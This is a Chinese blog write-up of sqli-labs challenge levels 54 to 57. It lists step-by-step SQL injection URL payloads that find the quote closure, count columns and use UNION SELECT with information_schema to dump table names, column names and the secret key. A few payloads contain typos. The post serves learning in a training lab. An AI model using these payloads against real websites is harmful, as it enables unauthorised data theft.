sqlilabs通关04-挑战篇:less54-

less54

image

提示的大致意思是:如果你不能在十次内注入成功,那么,表名、列名、数据就会刷新。

需要先在url中传递id参数进行注入尝试,然后获得密钥之后,填入到下面即为成功。

id=1‘ #无回显
?id=1' and 1=1--+ 有回显,所以大概率就是这个'闭合
?id=1' order by 4--+ 
?id=1' order by 3--+  有回显,那就是3个字段

判断回显点
?id=a1' union select 1,2,3--+   回显2和3
接下来就是猜数据库名、表名、字段名、由于每次都会变化,所以我们把10次凑齐,然后再接着操作


?id=1' union select 1,version(),database()--+  获取当前的数据库版本和数据库名称  challenges
?id=1' union select 1,2,group_conat(table_name) from inforamtion_schema.tables where table_schema=dabase();--+
?id=a1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- k      表名v1wqq27xdg
?id=a1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='v1wqq27xdg'-- k      字段:id,sessid,secret_ULRX,tryy
?id=a1' union select 1,2,(select group_concat(id,0x3e,sessid,0x3e,secret_ULRX,0x3e,tryy) from v1wqq27xdg)-- k      字段:id,sessid,secret_ULRX,tryy

image

less55

和上面的同理,闭合符号为)

?id=1
?id=1 and 1=2
?id=1 and sleep(3)--+
?id=1" and 1=1--+
?id=1)--+ #回显,说明是该闭合符
?id=1) order by 3--+
?id=1) order by 3--+ #不回显,说明3个字段
?id=12311) union select 2,3,4--+ #判断回显点
?id=12311) union select 2,database(),version()--+ #库名和版本号
?id=12311) union select 2,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+ 爆表ixcgv88gur
?id=12311) union select 2,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+ #为了方便,把次数用完,再爆一次 bvqe12szhe
?id=12311) union select 2,group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name='bvqe12szhe'--+ #爆字段名 id,sessid,secret_OGL8,tryy
?id=12311) union select 1,2,(select group_concat(id,0x3e,sessid,0x3e,secret_OGL8,0x3e,tryy) from bvqe12szhe)-- k #爆记录

1699409189604

image

less56

和上面的同理,闭合符号为')

?id=1') and 1=1--+
?id=1') and 1=2--+  #闭合符号为')
?id=123131') union select 2,group_concat(table_name),version() from information_schema.tables where table_schema=database()--+ 爆表ofc8irr26r
?id=12311') union select 2,group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name='ofc8irr26r'--+ #爆字段名 id,sessid,secret_9FFM,tryy
?id=12311') union select 1,2,(select group_concat(id,0x3e,sessid,0x3e,secret_9FFM,0x3e,tryy) from ofc8irr26r)-- k #爆记录

image

image

image

less57

闭合符号是"

判断闭合符号

?id=1
?id=2 and 1=2--+
?id=2") and 1=2--+ 不回显
?id=2") and 1=1--+ 不回显
?id=2') and 1=1--+ 回显
?id=2') and 1=2--+ 回显
?id=2' and 1=2--+ 回显
?id=1" and 3=1--+ 不回显
?id=1" and 1=1--+ 回显,说明注入点的闭合符号是"


?id=1" order by 3--+  判断字段数量
?id=1" order by 4--+  不回显,说明三个字段
回显点判断
?id=1" union select 1,2,3--+
posted @ 2024-05-01 00:06  阿窝鹅  阅读(3)  评论(0编辑  收藏  举报